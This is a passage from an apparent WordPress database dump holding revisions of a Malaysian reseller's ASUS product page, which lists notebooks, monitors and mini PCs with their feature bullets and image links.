<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2019-09-18 16:10:25','2019-09-18 08:10:25','',1442,'https://bintara.com.my/blog/2019/09/18/1442-revision-v1/',0,'revision','',0),(3200,1,'2019-09-18 16:12:05','2019-09-18 08:12:05','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>DESKTOP</h3>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2019-09-18 16:12:05','2019-09-18 08:12:05','',1442,'https://bintara.com.my/blog/2019/09/18/1442-revision-v1/',0,'revision','',0),(3201,1,'2019-09-18 16:15:26','2019-09-18 08:15:26','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>DESKTOP</h2>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 